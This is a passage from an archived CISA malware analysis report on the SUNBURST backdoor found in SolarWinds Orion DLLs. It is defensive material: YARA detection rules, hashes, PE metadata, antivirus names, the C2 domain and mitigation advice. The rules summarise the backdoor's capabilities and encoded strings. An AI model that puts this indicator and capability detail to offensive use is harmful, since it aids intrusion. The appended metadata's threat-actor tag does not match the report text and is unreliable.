Trojan.SunBurst.Win32.1\r\nYARA Rules\r\nrule CISA_10318927_01 : trojan rat SOLAR_FIRE\r\n{\r\n   meta:\r\n       Author = \"CISA Code \u0026 Media Analysis\"\r\n       Incident = \"10318927\"\r\n       Date = \"2020-12-13\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 22 of 30\n\nLast_Modified = \"20201213_2145\"\r\n       Actor = \"n/a\"\r\n       Category = \"TROJAN RAT\"\r\n       Family = \"SOLAR_FIRE\"\r\n       Description = \"This signature is based off of unique strings embedded within the modified Solar Winds app\"\r\n       MD5_1 = \"b91ce2fa41029f6955bff20079468448\"\r\n       SHA256_1 = \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\"\r\n       MD5_2 = \"846e27a652a5e1bfbd0ddd38a16dc865\"\r\n       SHA256_2 = \"ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\"\r\n   strings:\r\n       $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }\r\n       $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }\r\n       $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41\r\n00 41 00 3D 00 3D }\r\n       $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B\r\n00 53 00 79 00 30 00 42 }\r\n   condition:\r\nall of them\r\n}\r\nrule FireEye_20_00025668_01 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions.\r\nThe first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver\r\nnames/paths. 
SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set\r\nand create registry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $cmd_regex_encoded = \"U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA\" wide\r\n       $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D\r\n66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }\r\n       $fake_orion_event_encoded = \"U3ItS80rCaksSFWyUvIvyszPU9IBAA==\" wide\r\n       $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }\r\n       $fake_orion_eventmanager_encoded = \"U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==\" wide\r\n       $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67\r\n65 72 22 2C }\r\n       $fake_orion_message_encoded = \"U/JNLS5OTE9VslKqNqhVAgA=\" wide\r\n       $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }\r\n       $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }\r\n   condition:\r\n       $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or\r\n$fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and\r\n($fake_orion_message_encoded and $fake_orion_message_plain) )\r\n}\r\nrule FireEye_20_00025668_02 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 23 of 30\n\ncommunications. 
This rule is looking for each branch of the code that checks for which HTTP method is being used.\r\nThis is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally\r\ndesigned so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion.\r\nSUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create\r\nregistry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $a = \"0y3Kzy8BAA==\" wide\r\n       $aa = \"S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA\" wide\r\n       $ab = \"S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=\" wide\r\n       $ac = \"C88sSs1JLS4GAA==\" wide\r\n       $ad = \"C/UEAA==\" wide\r\n       $ae = \"C89MSU8tKQYA\" wide\r\n       $af = \"8wvwBQA=\" wide\r\n       $ag = \"cyzIz8nJBwA=\" wide\r\n       $ah = \"c87JL03xzc/LLMkvysxLBwA=\" wide\r\n       $ai = \"88tPSS0GAA==\" wide\r\n       $aj = \"C8vPKc1NLQYA\" wide\r\n       $ak = \"88wrSS1KS0xOLQYA\" wide\r\n       $al = \"c87PLcjPS80rKQYA\" wide\r\n       $am = \"Ky7PLNAvLUjRBwA=\" wide\r\n       $an = \"06vIzQEA\" wide\r\n       $b = \"0y3NyyxLLSpOzIlPTgQA\" wide\r\n       $c = \"001OBAA=\" wide\r\n       $d = \"0y0oysxNLKqMT04EAA==\" wide\r\n       $e = \"0y3JzE0tLknMLQAA\" wide\r\n       $f = \"003PyU9KzAEA\" wide\r\n       $h = \"0y1OTS4tSk1OBAA=\" wide\r\n       $i = \"K8jO1E8uytGvNqitNqytNqrVA/IA\" wide\r\n       $j = \"c8rPSQEA\" wide\r\n       $k = \"c8rPSfEsSczJTAYA\" wide\r\n       $l = \"c60oKUp0ys9JAQA=\" wide\r\n       $m = \"c60oKUp0ys9J8SxJzMlMBgA=\" wide\r\n       $n = \"8yxJzMlMBgA=\" wide\r\n       $o = \"88lMzygBAA==\" wide\r\n       $p = \"88lMzyjxLEnMyUwGAA==\" wide\r\n       $q = \"C0pNL81JLAIA\" wide\r\n       $r = \"C07NzXTKz0kBAA==\" wide\r\n       $s = \"C07NzXTKz0nxLEnMyUwGAA==\" wide\r\n       $t = 
\"yy9IzStOzCsGAA==\" wide\r\n       $u = \"y8svyQcA\" wide\r\n       $v = \"SytKTU3LzysBAA==\" wide\r\n       $w = \"C84vLUpOdc5PSQ0oygcA\" wide\r\n       $x = \"C84vLUpODU4tykwLKMoHAA==\" wide\r\n       $y = \"C84vLUpO9UjMC07MKwYA\" wide\r\n       $z = \"C84vLUpO9UjMC04tykwDAA==\" wide\r\n   condition:\r\n       ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q\r\nand $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad\r\nand $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))\r\n}\r\nssdeep Matches\r\n94 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134\r\nPE Metadata\r\nCompile Date 2020-05-11 17:32:40-04:00\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 24 of 30\n\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name SolarWinds Worldwide, LLC.\r\nFile Description SolarWinds.Orion.Core.BusinessLayer\r\nInternal Name SolarWinds.Orion.Core.BusinessLayer.dll\r\nLegal Copyright Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.\r\nOriginal Filename SolarWinds.Orion.Core.BusinessLayer.dll\r\nProduct Name SolarWinds.Orion.Core.BusinessLayer\r\nProduct Version 2020.2.5300.12432\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n87b3389568887539d8c12033e01bcbda header 512 2.901277\r\n58ca620058a1e26cda220dcb83f4eb26 .text 1018368 5.567638\r\n1d816f4a16b05559313aa30a0d3532d6 .rsrc 1536 3.008439\r\n0db83a842dbb0bb3396691d4238bd216 .reloc 512 0.101910\r\nDescription\r\nThis file has been identified as a SolarWinds Application module containing a patched in SUNBURST backdoor. 
This\r\nembedded SUNBURST code contains the same functions as \"SolarWinds.Orion.Core.BusinessLayer.dll\"\r\n(32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital\r\ncertificate.\r\n019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134\r\nTags\r\nbackdoortrojan\r\nDetails\r\nName SolarWinds.Orion.Core.BusinessLayer.dll\r\nSize 1028072 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 2c4a910a1299cdae2a4e55988a2f102e\r\nSHA1 2f1a5a7411d015d01aaee4535835400191645023\r\nSHA256 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134\r\nSHA512 5cbfefe612a40c8872a0faf3db8d3835dc514fb3df159610095b47c595c6caa1ada79cce2b10fb99e648990c3f54f63344d1fa7025090bfcd4e\r\nssdeep 12288:dJKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+cYvjenWHuhh9c0g8vkzE19Wv:rEfDbO97P8TrKhYbenWH4c0g8vkzE19e\r\nEntropy 5.579997\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nAntiy Trojan[Backdoor]/MSIL.Agent\r\nAvira TR/Sunburst.AH\r\nBitDefender Trojan.Sunburst.A\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 25 of 30\n\nClamav Win.Countermeasure.Sunburst-9809152-0\r\nComodo Backdoor\r\nCyren W32/Trojan.QTKK-7476\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Win32.Sunburst (A)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Sunburst.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.BR!dha\r\nNANOAV Trojan.Win32.SunBurst.iduxfm\r\nNetGate Trojan.Win32.Malware\r\nSophos Mal/Sunburst-A\r\nSymantec Backdoor.Sunburst\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Backdoo.6F8C6A1E\r\nTrendMicro House Call Backdoo.6F8C6A1E\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! 
Trojan.SunBurst.Win32.1\r\nYARA Rules\r\nrule CISA_10318927_01 : trojan rat SOLAR_FIRE\r\n{\r\n   meta:\r\n       Author = \"CISA Code \u0026 Media Analysis\"\r\n       Incident = \"10318927\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_2145\"\r\n       Actor = \"n/a\"\r\n       Category = \"TROJAN RAT\"\r\n       Family = \"SOLAR_FIRE\"\r\n       Description = \"This signature is based off of unique strings embedded within the modified Solar Winds app\"\r\n       MD5_1 = \"b91ce2fa41029f6955bff20079468448\"\r\n       SHA256_1 = \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\"\r\n       MD5_2 = \"846e27a652a5e1bfbd0ddd38a16dc865\"\r\n       SHA256_2 = \"ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\"\r\n   strings:\r\n       $s0 = { 63 00 30 00 6B 00 74 00 54 00 69 00 37 00 4B 00 4C 00 43 00 6A 00 4A 00 7A 00 4D 00 38 00 44 }\r\n       $s1 = { 41 00 41 00 3D 00 3D 00 00 21 38 00 33 00 56 00 30 00 64 00 6B 00 78 00 4A 00 4B 00 55 }\r\n       $s2 = { 63 00 2F 00 46 00 77 00 44 00 6E 00 44 00 4E 00 53 00 30 00 7A 00 4B 00 53 00 55 00 30 00 42 00 41\r\n00 41 00 3D 00 3D }\r\n       $s3 = { 53 00 69 00 30 00 75 00 42 00 67 00 41 00 3D 00 00 21 38 00 77 00 77 00 49 00 4C 00 6B 00 33 00 4B\r\n00 53 00 79 00 30 00 42 }\r\n   condition:\r\nall of them\r\n}\r\nrule FireEye_20_00025668_01 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 26 of 30\n\nAuthor = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"This rule is looking for portions of the SUNBURST backdoor that are vital to how it functions.\r\nThe first signature fnv_xor matches a magic byte xor that the sample performs on process, service, and driver\r\nnames/paths. 
SUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set\r\nand create registry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $cmd_regex_encoded = \"U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA\" wide\r\n       $cmd_regex_plain = { 5C 7B 5B 30 2D 39 61 2D 66 2D 5D 7B 33 36 7D 5C 7D 22 7C 22 5B 30 2D 39 61 2D\r\n66 5D 7B 33 32 7D 22 7C 22 5B 30 2D 39 61 2D 66 5D 7B 31 36 7D }\r\n       $fake_orion_event_encoded = \"U3ItS80rCaksSFWyUvIvyszPU9IBAA==\" wide\r\n       $fake_orion_event_plain = { 22 45 76 65 6E 74 54 79 70 65 22 3A 22 4F 72 69 6F 6E 22 2C }\r\n       $fake_orion_eventmanager_encoded = \"U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==\" wide\r\n       $fake_orion_eventmanager_plain = { 22 45 76 65 6E 74 4E 61 6D 65 22 3A 22 45 76 65 6E 74 4D 61 6E 61 67\r\n65 72 22 2C }\r\n       $fake_orion_message_encoded = \"U/JNLS5OTE9VslKqNqhVAgA=\" wide\r\n       $fake_orion_message_plain = { 22 4D 65 73 73 61 67 65 22 3A 22 7B 30 7D 22 }\r\n       $fnv_xor = { 67 19 D8 A7 3B 90 AC 5B }\r\n   condition:\r\n       $fnv_xor and ($cmd_regex_encoded or $cmd_regex_plain) or ( ($fake_orion_event_encoded or\r\n$fake_orion_event_plain) and ($fake_orion_eventmanager_encoded or $fake_orion_eventmanager_plain) and\r\n($fake_orion_message_encoded and $fake_orion_message_plain) )\r\n}\r\nrule FireEye_20_00025668_02 : SUNBURST APT backdoor\r\n{\r\n   meta:\r\n       Author = \"FireEye\"\r\n       Date = \"2020-12-13\"\r\n       Last_Modified = \"20201213_1917\"\r\n       Actor = \"n/a\"\r\n       Category = \"Backdoor\"\r\n       Family = \"SUNBURST\"\r\n       Description = \"The SUNBURST backdoor uses a domain generation algorithm (DGA) as part of C2\r\ncommunications. 
This rule is looking for each branch of the code that checks for which HTTP method is being used.\r\nThis is in one large conjunction, and all branches are then tied together via disjunction. The grouping is intentionally\r\ndesigned so that if any part of the DGA is re-used in another sample, this signature should match that re-used portion.\r\nSUNBURST is a backdoor that has the ability to spawn and kill processes, write and delete files, set and create\r\nregistry keys, gather system information, and disable a set of forensic analysis tools and services.\"\r\n       MD5_1 = \"\"\r\n       SHA256_1 = \"\"\r\n   strings:\r\n       $a = \"0y3Kzy8BAA==\" wide\r\n       $aa = \"S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA\" wide\r\n       $ab = \"S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA=\" wide\r\n       $ac = \"C88sSs1JLS4GAA==\" wide\r\n       $ad = \"C/UEAA==\" wide\r\n       $ae = \"C89MSU8tKQYA\" wide\r\n       $af = \"8wvwBQA=\" wide\r\n       $ag = \"cyzIz8nJBwA=\" wide\r\n       $ah = \"c87JL03xzc/LLMkvysxLBwA=\" wide\r\n       $ai = \"88tPSS0GAA==\" wide\r\n       $aj = \"C8vPKc1NLQYA\" wide\r\n       $ak = \"88wrSS1KS0xOLQYA\" wide\r\n       $al = \"c87PLcjPS80rKQYA\" wide\r\n       $am = \"Ky7PLNAvLUjRBwA=\" wide\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 27 of 30\n\n$an = \"06vIzQEA\" wide\r\n       $b = \"0y3NyyxLLSpOzIlPTgQA\" wide\r\n       $c = \"001OBAA=\" wide\r\n       $d = \"0y0oysxNLKqMT04EAA==\" wide\r\n       $e = \"0y3JzE0tLknMLQAA\" wide\r\n       $f = \"003PyU9KzAEA\" wide\r\n       $h = \"0y1OTS4tSk1OBAA=\" wide\r\n       $i = \"K8jO1E8uytGvNqitNqytNqrVA/IA\" wide\r\n       $j = \"c8rPSQEA\" wide\r\n       $k = \"c8rPSfEsSczJTAYA\" wide\r\n       $l = \"c60oKUp0ys9JAQA=\" wide\r\n       $m = \"c60oKUp0ys9J8SxJzMlMBgA=\" wide\r\n       $n = \"8yxJzMlMBgA=\" wide\r\n       $o = \"88lMzygBAA==\" wide\r\n       $p = \"88lMzyjxLEnMyUwGAA==\" wide\r\n       $q = \"C0pNL81JLAIA\" wide\r\n       $r = \"C07NzXTKz0kBAA==\" 
wide\r\n       $s = \"C07NzXTKz0nxLEnMyUwGAA==\" wide\r\n       $t = \"yy9IzStOzCsGAA==\" wide\r\n       $u = \"y8svyQcA\" wide\r\n       $v = \"SytKTU3LzysBAA==\" wide\r\n       $w = \"C84vLUpOdc5PSQ0oygcA\" wide\r\n       $x = \"C84vLUpODU4tykwLKMoHAA==\" wide\r\n       $y = \"C84vLUpO9UjMC07MKwYA\" wide\r\n       $z = \"C84vLUpO9UjMC04tykwDAA==\" wide\r\n   condition:\r\n       ($a and $b and $c and $d and $e and $f and $h and $i) or ($j and $k and $l and $m and $n and $o and $p and $q\r\nand $r and $s and ($aa or $ab)) or ($t and $u and $v and $w and $x and $y and $z and ($aa or $ab)) or ($ac and $ad\r\nand $ae and $af and $ag and $ah and ($am or $an)) or ($ai and $aj and $ak and $al and ($am or $an))\r\n}\r\nssdeep Matches\r\n94 ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\r\nPE Metadata\r\nCompile Date 2020-04-21 10:53:33-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name SolarWinds Worldwide, LLC.\r\nFile Description SolarWinds.Orion.Core.BusinessLayer\r\nInternal Name SolarWinds.Orion.Core.BusinessLayer.dll\r\nLegal Copyright Copyright © 1999-2020 SolarWinds Worldwide, LLC. All Rights Reserved.\r\nOriginal Filename SolarWinds.Orion.Core.BusinessLayer.dll\r\nProduct Name SolarWinds.Orion.Core.BusinessLayer\r\nProduct Version 2020.2.5200.12394\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n7810cd48d16fb0d3c3a0c855f2d9225a header 512 2.907043\r\nf249efb5d984eb62f325179a721985f3 .text 1018368 5.567580\r\n9aea23ae0750b77218d9a85d4896eb0c .rsrc 1536 3.005835\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 28 of 30\n\nMD5 Name Raw Size Entropy\r\n0db83a842dbb0bb3396691d4238bd216 .reloc 512 0.101910\r\nDescription\r\nThis file has been identified as a SolarWinds Application module containing a patched in SUNBURST backdoor. 
This\r\nembedded SUNBURST code contains the same functions as \"SolarWinds.Orion.Core.BusinessLayer.dll\"\r\n(32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77), and is signed with the same digital\r\ncertificate.\r\nRelationship Summary\r\n32519b85c0... Connected_To avsvmcloud.com\r\n32519b85c0... Contained_Within d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\navsvmcloud.com Connected_From 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nd0d626deb3... Contains 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nConclusion\r\nPlease refer to the following resources for additional information and mitigation actions related to this campaign:\r\n1) Alert (AA20-352A): Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and\r\nPrivate Sector Organizations\r\nhttps://us-cert.cisa.gov/ncas/alerts/aa20-352a\r\n2) Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise\r\nhttps://cyber.dhs.gov/ed/21-01/\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. 
Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to execution.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 29 of 30\n\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances, this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. 
To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to CISA at 1-844-Say-CISA or CISA Central.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nFebruary 8, 2021: Initial Version|April 15, 2021: Updated with Attribution Statement\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 30 of 30",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a"
	],
	"report_names": [
		"ar21-039a"
	],
	"threat_actors": [
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006",
				"Daserf",
				"Stalker Panda",
				"Swirl Typhoon",
				"Tick"
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775433992,
	"ts_updated_at": 1775826790,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5ffae5b175dbc71065f303731692e314324726cb.pdf",
		"text": "https://archive.orkl.eu/5ffae5b175dbc71065f303731692e314324726cb.txt",
		"img": "https://archive.orkl.eu/5ffae5b175dbc71065f303731692e314324726cb.jpg"
	}
}